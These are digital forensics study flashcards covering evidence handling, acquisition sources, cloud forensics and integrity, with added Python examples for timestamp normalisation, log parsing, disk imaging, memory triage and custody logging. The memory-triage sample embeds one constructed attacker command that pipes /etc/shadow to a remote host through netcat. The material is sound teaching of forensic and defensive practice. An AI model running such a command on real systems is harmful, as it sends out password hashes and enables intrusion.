4.5 Digital Forensics Flashcards
The application of science to the identification, collection, examination, and analysis of data while preserving the integrity of the information and maintaining a strict chain of custody for the data.
• Collect and protect information relating to an intrusion
– Many different data sources and protection mechanisms
• RFC 3227 - Guidelines for Evidence Collection and Archiving
– A good set of best practices
• Standard digital forensic process
– Acquisition, analysis, and reporting
• Must be detail oriented
– Take extensive notes
Digital forensics
An internal process that an organization undergoes to preserve all data that might relate to a legal action involving the organization.
• A legal technique to preserve relevant information
– Prepare for impending litigation
– Initiated by legal counsel
• Hold notification
– Records custodians are instructed to preserve data
• Separate repository for electronically stored information (ESI)
– Many different data sources and types
– Unique workflow and retention requirements
• Ongoing preservation
– Once notified, there’s an ongoing obligation to preserve data
Legal hold
• A moving record of the event
– Gathers information external to the computer and network
• Captures the status of the screen and other volatile information
– Today’s mobile video devices are remarkable
• Don’t forget security cameras and your phone
• The video content must also be archived
– May hold some of the most important records of the event
Capture video
Capable of being allowed or conceded; permissible: evidence legally admissible in court.
• Not all data can be used in a court of law
– Different rules in different jurisdictions
• Legal authorization
– Search and seizure of information
• Procedures and tools
– The correct tools used the correct way
• Laboratories
– Proper scientific principles used to analyze the evidence
• Technical and academic qualifications
– Competence and qualifications of experts
Admissibility
• Control evidence
– Maintain integrity
• Document everyone who contacts the evidence
– Use hashes
– Avoid tampering
• Label and catalog everything
– Digitally tag all items for ongoing documentation
– Seal and store
Chain of custody
• The time zone determines how the time is displayed
– Document the local device settings
• Different file systems store timestamps differently
– FAT: Time is stored in local time
– NTFS: Time is stored in UTC (often labelled GMT)
• Record the time offset from the operating system
– The Windows Registry (HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation)
– Many different values (daylight saving time, time change information, etc.)
Recording time offsets
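The two file-system rules above (FAT keeps local time with no zone information, NTFS keeps UTC as a 64-bit FILETIME) are what make the recorded offset matter. The example below is added here and is not part of the original flashcards: it decodes both formats and normalises a FAT timestamp to UTC using the ActiveTimeBias value documented from the seized device’s registry. The FAT words, the bias of 300 minutes and the NTFS value are constructed sample inputs, not values from a real case.

```python
from datetime import datetime, timedelta, timezone

# Number of 100-ns ticks between the NTFS epoch (1601-01-01 UTC) and the Unix epoch.
FILETIME_UNIX_EPOCH = 116444736000000000
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def filetime_to_utc(filetime: int) -> datetime:
    """NTFS stores timestamps as 100-ns ticks since 1601-01-01 UTC, so no zone offset is applied."""
    return UNIX_EPOCH + timedelta(microseconds=(filetime - FILETIME_UNIX_EPOCH) // 10)


def utc_to_filetime(when: datetime) -> int:
    """Inverse of filetime_to_utc, used here only to build a constructed sample value."""
    return ((when - UNIX_EPOCH) // timedelta(microseconds=1)) * 10 + FILETIME_UNIX_EPOCH


def fat_to_naive_local(date_word: int, time_word: int) -> datetime:
    """FAT packs date and time into two 16-bit words in the device's LOCAL time with no zone info."""
    year = 1980 + (date_word >> 9)
    month = (date_word >> 5) & 0x0F
    day = date_word & 0x1F
    hour = time_word >> 11
    minute = (time_word >> 5) & 0x3F
    second = (time_word & 0x1F) * 2          # FAT time has 2-second resolution
    return datetime(year, month, day, hour, minute, second)


def local_to_utc(naive_local: datetime, active_time_bias_min: int) -> datetime:
    """Windows keeps the offset in TimeZoneInformation\\ActiveTimeBias (minutes): UTC = local + bias."""
    return (naive_local + timedelta(minutes=active_time_bias_min)).replace(tzinfo=timezone.utc)


def interpret_fat(date_word: int, time_word: int, active_time_bias_min: int) -> datetime:
    """Turn a FAT timestamp into UTC using the bias documented from the seized device."""
    return local_to_utc(fat_to_naive_local(date_word, time_word), active_time_bias_min)


# Constructed sample: the same event recorded on a FAT-formatted USB stick and an NTFS volume.
# The FAT words encode 2024-02-10 12:34:56 local; the device's registry showed ActiveTimeBias = 300 (UTC-5).
SAMPLE_FAT_DATE, SAMPLE_FAT_TIME = 22602, 25692
DOCUMENTED_BIAS_MIN = 300
SAMPLE_NTFS_FILETIME = utc_to_filetime(datetime(2024, 2, 10, 17, 34, 56, tzinfo=timezone.utc))


def timeline_entry() -> dict:
    """Both timestamps normalised to UTC; they agree only when the recorded bias is used."""
    fat_utc = interpret_fat(SAMPLE_FAT_DATE, SAMPLE_FAT_TIME, DOCUMENTED_BIAS_MIN)
    ntfs_utc = filetime_to_utc(SAMPLE_NTFS_FILETIME)
    wrong_bias = interpret_fat(SAMPLE_FAT_DATE, SAMPLE_FAT_TIME, 240)   # analyst guessed UTC-4
    return {
        "fat_utc": fat_utc.isoformat(),
        "ntfs_utc": ntfs_utc.isoformat(),
        "consistent": fat_utc == ntfs_utc,
        "error_if_bias_guessed_min": int((wrong_bias - fat_utc).total_seconds() // 60),
    }


if __name__ == "__main__":
    print(timeline_entry())
```

Guessing the bias instead of reading it from the device shifts every FAT timestamp by the difference (an hour here), which is enough to put a file write on the wrong side of a logon event in the timeline.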
Give an audit trail that records user events on a PC; a potential source of evidence in forensic examinations.
• System logs
– Document important operating system and application events
• Export and store for future reference
– Filter and parse
• Log store
– Linux: /var/log
– Windows: Event Viewer
Event logs
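“Filter and parse” is the step that turns an exported log into evidence. The example below is added here and is not part of the original flashcards: it parses a few constructed auth.log lines in the Linux syslog format (these are sample lines, not from a real host) and flags a source address whose successful login follows a run of failures. Syslog lines carry no year and no time zone, so both have to come from the documented device settings, which is why the parser takes the year as an argument.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in Linux auth.log (syslog) format; not taken from a real system.
SAMPLE_AUTH_LOG = """\
Feb 10 12:34:56 ws01 sshd[1203]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Feb 10 12:34:58 ws01 sshd[1203]: Failed password for invalid user admin from 203.0.113.5 port 51236 ssh2
Feb 10 12:35:01 ws01 sshd[1204]: Failed password for root from 203.0.113.5 port 51240 ssh2
Feb 10 12:35:07 ws01 sshd[1204]: Accepted password for root from 203.0.113.5 port 51240 ssh2
Feb 10 12:35:09 ws01 sshd[1204]: pam_unix(sshd:session): session opened for user root by (uid=0)
Feb 10 12:40:12 ws01 sshd[1301]: Accepted publickey for alice from 198.51.100.7 port 40022 ssh2
"""

SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<proc>[\w.-]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)
SSH_AUTH_RE = re.compile(
    r"^(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)


def parse_auth_log(text: str, year: int) -> list:
    """Parse each line into a dict; lines that are not sshd auth results are skipped."""
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        auth = SSH_AUTH_RE.match(m["msg"])
        if not auth:
            continue
        # Syslog has no year: supply the one documented for the device.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"when": ts, "host": m["host"], **auth.groupdict()})
    return events


def brute_force_then_success(events: list, min_failures: int = 3) -> list:
    """Flag a source IP whose Accepted login follows at least min_failures earlier failures."""
    failures = defaultdict(int)
    findings = []
    for e in sorted(events, key=lambda e: e["when"]):
        if e["result"] == "Failed":
            failures[e["ip"]] += 1
        elif failures[e["ip"]] >= min_failures:
            findings.append({"ip": e["ip"], "user": e["user"],
                             "failures_before": failures[e["ip"]],
                             "accepted_at": e["when"].isoformat()})
    return findings


if __name__ == "__main__":
    for finding in brute_force_then_success(parse_auth_log(SAMPLE_AUTH_LOG, year=2024)):
        print(finding)
```

The parsed timestamps are still naive local time; convert them with the recorded time offset before placing them next to NTFS or cloud timestamps.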
• Who might have seen this?
– You won’t know until you ask
• Interview and document
– These folks might not be around later
• Not all witness statements are 100% accurate
– Humans are fallible
Interviews
• Document the findings
– For internal use, legal proceedings, etc.
• Summary information
– Overview of the security event
• Detailed explanation of data acquisition
– Step-by-step method of the process
• The findings
– An analysis of the data
• Conclusion
– Professional results, given the analysis
Reports
Forensics Data Acquisition -
• How long does data stick around?
– Some media are much more volatile than others
– Gather data in order from the most volatile to the least volatile
Order of volatility
Forensics Data Acquisition -
• Copy everything on a storage drive
– Hard drive, SSD, flash drive
• Drive image preparation
– Power down to prevent changes (after any live collection; encrypted volumes may be unreadable afterwards)
– Remove storage drive
• Connect to imaging device
– With write-protection
• Forensic clone
– Bit-for-bit copy
– Preserve all data (even the “deleted” data)
Disk
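A forensic clone has to copy every sector, not every file, and it has to cope with sectors the drive can no longer read without changing the image geometry. The example below is added here and is not part of the original flashcards: it images a constructed five-sector “drive” (a stand-in object, not a real block device) sector by sector, zero-fills an unreadable sector the way dd conv=noerror,sync does, hashes the bytes as they are written, and verifies the stored image against that hash. The deleted-file remnant in unallocated space survives in the image, which a file-level copy would miss.

```python
import hashlib
import io

BLOCK = 512  # sector size used by the constructed device below


class FaultyDevice:
    """Stand-in for a raw block device behind a write blocker (constructed for this example).

    Some sectors return I/O errors, as a failing drive would; there is deliberately no write path.
    """

    def __init__(self, data: bytes, bad_blocks=()):
        self._data = data
        self._bad = set(bad_blocks)

    @property
    def nblocks(self) -> int:
        return (len(self._data) + BLOCK - 1) // BLOCK

    def read_block(self, n: int) -> bytes:
        if n in self._bad:
            raise OSError(f"I/O error reading block {n}")
        return self._data[n * BLOCK:(n + 1) * BLOCK]


def acquire(dev: FaultyDevice, out) -> tuple:
    """Bit-for-bit copy of every sector, including unallocated ('deleted') space.

    Unreadable sectors are zero-filled so the image keeps its geometry (the same effect as
    dd conv=noerror,sync) and their numbers are returned for the acquisition notes.
    The SHA-256 is computed over the bytes actually written.
    """
    digest = hashlib.sha256()
    unreadable = []
    for n in range(dev.nblocks):
        try:
            chunk = dev.read_block(n)
        except OSError:
            chunk = b"\x00" * BLOCK
            unreadable.append(n)
        out.write(chunk)
        digest.update(chunk)
    return digest.hexdigest(), unreadable


def verify_image(image: bytes, acquisition_sha256: str) -> bool:
    """Re-hash the stored image and compare with the hash taken during acquisition."""
    return hashlib.sha256(image).hexdigest() == acquisition_sha256


# Constructed five-sector 'drive': an active file, one bad sector, and remnants of a deleted file.
SAMPLE_DISK = b"".join([
    b"BOOT".ljust(BLOCK, b"\x00"),
    b"ACTIVE: quarterly_report.docx".ljust(BLOCK, b"\x00"),
    b"UNREADABLE".ljust(BLOCK, b"\x00"),           # block 2 will fail to read
    b"DELETED: payroll.xlsx remnant".ljust(BLOCK, b"\x00"),
    b"\x00" * BLOCK,
])


def image_sample_disk() -> dict:
    dev = FaultyDevice(SAMPLE_DISK, bad_blocks=[2])
    buf = io.BytesIO()
    sha, bad = acquire(dev, buf)
    image = buf.getvalue()
    return {"sha256": sha, "unreadable_blocks": bad, "image": image,
            "verified": verify_image(image, sha)}


if __name__ == "__main__":
    r = image_sample_disk()
    print(r["sha256"], "unreadable:", r["unreadable_blocks"], "verified:", r["verified"])
```

When a drive has unreadable sectors, a second hash of the source will not match the image hash, so the list of zero-filled sectors belongs in the acquisition notes alongside the hash.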
Forensics Data Acquisition -
A form of computer memory that can be read and changed in any order, typically used to store working data and machine code; short-term memory where data is held as the processor needs it.
• A difficult target to capture
– Changes constantly
– Capturing data changes the data
• Memory dump
– Grab everything in active RAM
– Many third-party tools
• Important data
– Browsing history
– Clipboard information
– Encryption keys
– Command history
Random access memory (RAM)
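Once a memory dump is on disk, the first pass is usually the same three things: pull out printable strings, pick out URLs, and look for blocks that are too random to be text (candidate key material). The example below is added here and is not part of the original flashcards; it runs those three passes over a constructed 224-byte slice standing in for a dump. The 32-byte “key” is an arbitrary value with all-distinct bytes chosen for the example, not a real key, and the entropy threshold of 4.5 bits per byte is an assumption that separates English text from key-like data in 32-byte windows.

```python
import math
import re
from collections import Counter

WINDOW = 32  # AES-256 keys are 32 bytes; scan the dump in 32-byte blocks


def extract_strings(blob: bytes, min_len: int = 8) -> list:
    """Equivalent of `strings`: runs of printable ASCII at least min_len long."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


def find_urls(blob: bytes) -> list:
    return [m.group().decode("ascii") for m in re.finditer(rb"https?://[\x21-\x7e]+", blob)]


def shannon_entropy(block: bytes) -> float:
    """Bits per byte; 32 distinct bytes in a 32-byte block give the maximum of 5.0."""
    n = len(block)
    return -sum(c / n * math.log2(c / n) for c in Counter(block).values())


def find_high_entropy_blocks(blob: bytes, threshold: float = 4.5) -> list:
    """Offsets of WINDOW-sized blocks whose entropy looks like key material rather than text."""
    return [off for off in range(0, len(blob) - WINDOW + 1, WINDOW)
            if shannon_entropy(blob[off:off + WINDOW]) >= threshold]


def _pad(b: bytes) -> bytes:
    return b + b"\x00" * (-len(b) % WINDOW)


# Constructed stand-in for a slice of a memory dump. The 'key' is an arbitrary 32-byte value with
# all-distinct bytes chosen for the example, not a real key.
KEY_CANDIDATE = bytes.fromhex("3a7f1c9e5b02d4a8e6f173c5920bd8f4" "6e1d48b7a93c05f2cb8e5a17d26f39b0")
SAMPLE_DUMP = (
    _pad(b"https://intranet.example.com/login?user=alice")   # browsing history remnant
    + _pad(b"bash: cat /etc/shadow | nc 203.0.113.5 4444")   # command history remnant
    + KEY_CANDIDATE                                          # sits at offset 128
    + b"\x00" * 64
)


def triage(blob: bytes) -> dict:
    return {
        "strings": extract_strings(blob),
        "urls": find_urls(blob),
        "key_candidates": [blob[o:o + WINDOW].hex() for o in find_high_entropy_blocks(blob)],
    }


if __name__ == "__main__":
    print(triage(SAMPLE_DUMP))
```

On a real dump the entropy pass produces false positives (compressed data, certificates), so candidates are confirmed by trying them against the encrypted volume, not by the score alone.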
Forensics Data Acquisition -
space on a hard drive used as a temporary location to store information when RAM is fully utilized. Using a [this], a computer can use more memory than what is physically installed in the computer.
• Used by different operating systems
– Slightly different usage in each
• A place to store RAM when memory is depleted
– There’s a lot more space on the storage drive
– Transfer pages of RAM to a storage drive
• Can also contain portions of an application
– Page out portions that aren’t in use
• Contains data similar to a RAM dump
– Anything active on the system
Swap/pagefile
Forensics Data Acquisition -
• OS files and data
– May have been modified
• Core operating system
– Executable files and libraries
– Can be compared later to known-good files
– Usually captured with a drive image
• Other OS data
– Logged in users
– Open ports
– Processes currently running
– Attached device list
Operating system
Forensics Data Acquisition -
• Mobile devices and tablets
– A more challenging forensics task
• Capture data
– Use an existing backup file
– Transfer image over USB
• Data
– Phone calls
– Contact information
– Text messages
– Email data
– Images and movies
Device
Forensics Data Acquisition -
• Extract the device firmware
– Rootkits and exploited hardware devices
– A reprogrammed firmware or ROM
• Specific to the platform
– Firmware implementations vary widely
• Attacker gains access to the device
– Maintains access through OS updates
• Data discovery
– Exploit data
– Firmware functionality
– Real-time data
Firmware
Forensics Data Acquisition -
• Generally associated with virtual machines (VMs)
– A point-in-time system image
• Incremental between snapshots
– Original image is the full backup
– Each snapshot records only the changes since the previous one
– Restoring requires the original and every snapshot in the chain
• Contains all files and information about a VM
– Similar to a system image
– Operating system, applications, user data, etc.
Snapshot
Forensics Data Acquisition -
• Store data for use later
– Often used to increase performance
– Many different caches (CPU, disk, Internet, etc.)
• Can contain specialized data
– CPU cache is very short-lived storage for instructions and data
• Some data may never be used
– Erased after a specified timeframe or when the cache is full
– Browser caches are often long-lived
• Data
– URL locations
– Browser page components (text, images)
Cache
Forensics Data Acquisition -
• Gather information about and from the network
– Network connections, packet captures
• Inbound and outbound sessions
– OS and application traffic
• Packet data
– Capture raw network data
– May include long-term packet captures
• Third-party packet captures
– Firewalls, IPS, etc.
Network
Forensics Data Acquisition -
• Digital items left behind
– Every contact leaves a trace
– May not be obvious to access
• Artifact locations
– Log information
– Flash memory
– Prefetch cache files
– Recycle Bin
– Browser bookmarks and logins
Artifacts
On-Premises vs. Cloud Forensics -
• Cloud technologies add complexity to the digital forensics process
• Technical challenges
– Devices are not totally in your control
– There may be limited access
– Associating data with a specific user can be difficult
• Legal issues
– Laws are different around the world
– The rules may not be immediately obvious
Forensics in the cloud
On-Premises vs. Cloud Forensics -
• Common to work with business partners
– Data sharing
– Outsourcing
• Cloud computing providers
– Can hold all of the data
– Manage Internet access
– Are they secure?
• Right-to-audit should be in the contract
– A legal agreement to have the option to perform a security audit at any time
– Everyone agrees to the terms and conditions
– Ability to verify security before a breach occurs
Right to audit clauses
On-Premises vs. Cloud Forensics -
• Cloud computing technology appeared relatively quickly
– The legal world is scrambling to catch up
• Forensics professionals must know their legal rights
– Data in a different jurisdiction may be bound by very different regulations
• Data stored in the cloud may not be located in the same country
– Location of the data center may determine how data can be treated
• Location of the data is critical
– Legal frameworks vary widely between countries
– Some countries don’t allow electronic searches outside of their borders
Regulatory/jurisdiction
On-Premises vs. Cloud Forensics -
• Notification laws
– If consumer data is breached, the consumer must be informed
• Many data breach notification laws
– Vary widely across countries and localities
– If you’re in the cloud, you’re a global entity
• Notification requirements also vary
– Type of data breached
– Who gets notified
– How quickly
Data breach notification laws
Managing Evidence -
• Hashing
– Cryptographic integrity verification
– A digital “fingerprint”
• Checksums
– Protects against accidental changes during transmission
– A relatively simple integrity check
– Not designed to replace a hash
• Provenance
– Documentation of authenticity
– A chain of custody for data handling
– Blockchain technology
Integrity
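The Chain of custody card (“use hashes”, “label and catalog everything”) and the Integrity card above are two halves of the same control: a hash proves the evidence is unchanged, and a record of who held it, when, and what hash they saw proves the handling. The example below is added here and is not part of the original flashcards. The first part shows why a checksum is “not designed to replace a hash”: swapping two digits in a constructed evidence fragment leaves a 16-bit additive checksum unchanged while SHA-256 changes. The second part is a small append-only custody log in which every entry carries the evidence hash and the hash of the previous entry, so editing either the evidence or the record is caught by verify(). The handlers, actions and timestamps are constructed sample data.

```python
import hashlib
import json
from datetime import datetime, timezone


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def additive_checksum(data: bytes) -> int:
    """16-bit additive checksum of the kind used to catch accidental errors in transit."""
    return sum(data) & 0xFFFF


def swap_bytes(data: bytes, i: int, j: int) -> bytes:
    """Deliberate edit that leaves the byte multiset unchanged, so an additive checksum cannot see it."""
    b = bytearray(data)
    b[i], b[j] = b[j], b[i]
    return bytes(b)


# Constructed evidence fragment; swapping the first and last digit of the account number
# changes its meaning without changing the sum of its bytes.
ORIGINAL = b"transfer 1000 USD to account 12345678"
TAMPERED = swap_bytes(ORIGINAL, ORIGINAL.index(b"1234"), ORIGINAL.index(b"5678") + 3)


def integrity_check(before: bytes, after: bytes) -> dict:
    return {
        "checksum_detects_change": additive_checksum(before) != additive_checksum(after),
        "hash_detects_change": sha256_hex(before) != sha256_hex(after),
    }


class CustodyLog:
    """Append-only chain-of-custody record. Each entry names the handler, the action, the
    evidence hash at that moment and the hash of the previous entry, so neither the evidence
    nor the record itself can be altered without verify() noticing."""

    GENESIS = "0" * 64

    def __init__(self):
        self.entries = []

    def record(self, handler: str, action: str, evidence: bytes, when: datetime) -> dict:
        entry = {
            "seq": len(self.entries) + 1,
            "when": when.astimezone(timezone.utc).isoformat(),
            "handler": handler,
            "action": action,
            "evidence_sha256": sha256_hex(evidence),
            "prev_entry_hash": self.entries[-1]["entry_hash"] if self.entries else self.GENESIS,
        }
        entry["entry_hash"] = sha256_hex(json.dumps(entry, sort_keys=True).encode())
        self.entries.append(entry)
        return entry

    def verify(self, evidence: bytes) -> tuple:
        """Return (ok, reason): checks every entry hash, the chain links, and that the
        evidence still has the hash recorded at every hand-off."""
        prev = self.GENESIS
        current = sha256_hex(evidence)
        for e in self.entries:
            body = {k: v for k, v in e.items() if k != "entry_hash"}
            if sha256_hex(json.dumps(body, sort_keys=True).encode()) != e["entry_hash"]:
                return False, f"entry {e['seq']} was altered"
            if e["prev_entry_hash"] != prev:
                return False, f"entry {e['seq']} does not link to the previous entry"
            if e["evidence_sha256"] != current:
                return False, f"evidence no longer matches the hash recorded at entry {e['seq']}"
            prev = e["entry_hash"]
        return True, "chain intact, evidence unchanged"


def demo_custody() -> tuple:
    """Three hand-offs on the same evidence, then verify() against the intact evidence,
    against a tampered copy, and after someone edits an entry in the record."""
    log = CustodyLog()
    t0 = datetime(2024, 2, 10, 17, 40, tzinfo=timezone.utc)   # constructed timestamps
    log.record("A. Examiner", "acquired image, sealed in bag E-1", ORIGINAL, t0)
    log.record("B. Courier", "transported to lab, seal intact", ORIGINAL, t0.replace(hour=19))
    log.record("C. Analyst", "opened seal, worked from a copy", ORIGINAL, t0.replace(day=11))
    intact = log.verify(ORIGINAL)
    tampered_evidence = log.verify(TAMPERED)
    log.entries[1]["handler"] = "Z. Nobody"      # record edited after the fact
    altered_record = log.verify(ORIGINAL)
    return intact, tampered_evidence, altered_record


if __name__ == "__main__":
    print(integrity_check(ORIGINAL, TAMPERED))
    for result in demo_custody():
        print(result)
```

The hash chain only proves the log is internally consistent; it is the sealed bag, the signatures and the witness at each hand-off that make the record credible in court.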
Managing Evidence -
• Handling evidence
– Isolate and protect the data
– Analyze the data later without any alterations
• Manage the collection process
– Work from copies
– Manage the data collection from mobile devices
• Live collection has become an important skill
– Data may be encrypted or difficult to collect after powering down
• Follow best practices to ensure admissibility of data in court
– What happens now affects the future
Preservation
Managing Evidence -
• [this]
– Collect, prepare, review, interpret, and produce electronic documents
• E-discovery gathers data required by the legal process
– Does not generally involve analysis
– There’s no consideration of intent
• Works together with digital forensics
– The e-discovery process obtains a storage drive
– Data on the drive is smaller than expected
– Forensics experts determine that data was deleted and
attempt to recover the data
E-discovery (Electronic discovery)
Managing Evidence -
• Extract missing data without affecting the integrity of the data
– Requires training and expertise
• The recovery process can vary
– Deleted files
– Hidden data
– Hardware or software corruption
– Storage device is physically damaged
Data recovery
Managing Evidence -
• Proof of data integrity and the origin of the data
– The data is unchanged and really did come from the sender
– Hashing the data
• Authentication that is genuine with high confidence
– The only person who could have sent the data is the sender
• Message Authentication Code (MAC)
– Either party holding the shared key can verify the data, but either could also have created it, so a MAC alone does not prove to a third party who sent it
• Digital Signature
– Only the holder of the private key can sign; the non-repudiation can be publicly verified
Non-repudiation
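The difference between the last two bullets is easiest to see in code. The example below is added here and is not part of the original flashcards. With an HMAC the receiver must hold the same key as the sender, so the receiver can manufacture a valid tag for a message the sender never sent; with a signature only the private key can sign and anyone holding the public key can verify. The signature scheme used is a Lamport one-time signature, chosen here because it needs nothing beyond SHA-256 from the standard library; it is not the scheme used by any particular product, and each Lamport key pair must sign exactly one message. The keys and message are constructed for the example.

```python
import hashlib
import hmac
import os


# --- MAC: one shared key, so the receiver can produce the same tag the sender can ---

def mac_tag(shared_key: bytes, message: bytes) -> bytes:
    return hmac.new(shared_key, message, hashlib.sha256).digest()


def mac_verify(shared_key: bytes, message: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(mac_tag(shared_key, message), tag)


def receiver_can_forge(shared_key: bytes) -> bool:
    """The receiver (who must hold the key to verify) makes a tag for a message the sender never sent."""
    forged = b"alice agrees to pay bob 1000 USD"
    return mac_verify(shared_key, forged, mac_tag(shared_key, forged))


# --- Lamport one-time signature: private key signs, public key verifies, no shared secret ---
# Chosen because it needs only a hash function; each key pair must sign exactly ONE message.

def lamport_keygen() -> tuple:
    sk = [(os.urandom(32), os.urandom(32)) for _ in range(256)]
    pk = [(hashlib.sha256(a).digest(), hashlib.sha256(b).digest()) for a, b in sk]
    return sk, pk


def _message_bits(message: bytes) -> list:
    d = int.from_bytes(hashlib.sha256(message).digest(), "big")
    return [(d >> (255 - i)) & 1 for i in range(256)]


def lamport_sign(sk: list, message: bytes) -> list:
    """Reveal, for each bit of H(message), the secret that corresponds to that bit value."""
    return [sk[i][bit] for i, bit in enumerate(_message_bits(message))]


def lamport_verify(pk: list, message: bytes, signature: list) -> bool:
    """Anyone with the public key can check that the revealed secrets hash to the published values."""
    if len(signature) != 256:
        return False
    return all(hashlib.sha256(s).digest() == pk[i][bit]
               for i, (bit, s) in enumerate(zip(_message_bits(message), signature)))


def demo() -> dict:
    shared_key = os.urandom(32)            # constructed: the key Alice and Bob share for the MAC
    msg = b"transfer 1000 USD to account 12345678"
    sk, pk = lamport_keygen()
    sig = lamport_sign(sk, msg)
    return {
        "mac_valid": mac_verify(shared_key, msg, mac_tag(shared_key, msg)),
        "mac_forgeable_by_receiver": receiver_can_forge(shared_key),
        "sig_valid": lamport_verify(pk, msg, sig),
        "sig_rejects_altered_message": not lamport_verify(pk, msg + b"0", sig),
        "sig_rejects_other_key": not lamport_verify(lamport_keygen()[1], msg, sig),
    }


if __name__ == "__main__":
    print(demo())
```

For evidence handling this is why a signed hash (examiner’s signature over the image digest) carries weight that an HMAC shared between examiner and lab does not: the lab could have produced the HMAC itself.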
Managing Evidence -
• [this(a)]
– A focus on key threat activity for a domain
– Business sectors, geographical regions, countries
– Gather information from internal threat reports, third-party data sources, and other data inputs
– Determine the threat landscape based on the trends
• [this(b)]
– Prevent hostile intelligence operations
– Discover and disrupt foreign intelligence threats
– Gather threat information on foreign intelligence operations
(a) Strategic intelligence / (b) counterintelligence